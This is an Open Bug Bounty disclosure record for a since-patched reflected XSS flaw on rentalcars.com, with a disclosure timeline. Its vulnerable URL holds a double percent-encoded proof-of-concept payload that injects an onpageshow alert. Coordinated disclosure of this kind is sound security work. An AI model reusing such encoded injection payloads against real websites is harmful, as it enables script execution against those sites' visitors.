rentalcars.com XSS vulnerability

2016-09-16T19:13:00
ID OBB:181967
Type openbugbounty
Reporter tbm
Modified 2016-10-25T19:33:00

Description

Vulnerable URL:
http://www.rentalcars.com/en/airport/gb/lhr/type/%2563%256F%256E%2576%2565%2572%2574%2569%2562%256C%2565%2522%253E%253C%2562%256F%2564%2579%252F%254F%254E%2570%2561%2567%2565%2573%2568%256F%2577%253D%2561%256C%2565%2572%2574%2528%2527%254F%2550%2545%254E%2542%2555%2547%2542%254F%2555%254E%2554%2559%2527%2529%253E/
Details:

Description| Value
---|---
Patched:| Yes, at 19.10.2016
Latest check for patch:| 19.10.2016 12:41 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2082
VIP website status:| Yes
Check rentalcars.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 16 September, 2016 19:13 GMT
Vulnerability existence verified and confirmed| 18 September, 2016 15:43 GMT
Generic security notifications sent to website owner| 18 September, 2016 15:43 GMT
Notification sent to subscribers (without technical details)| 18 September, 2016 18:17 GMT
Vulnerability patched by the website owner| 25 October, 2016 14:10 GMT
Vulnerability details disclosed by researcher| 25 October, 2016 19:33 GMT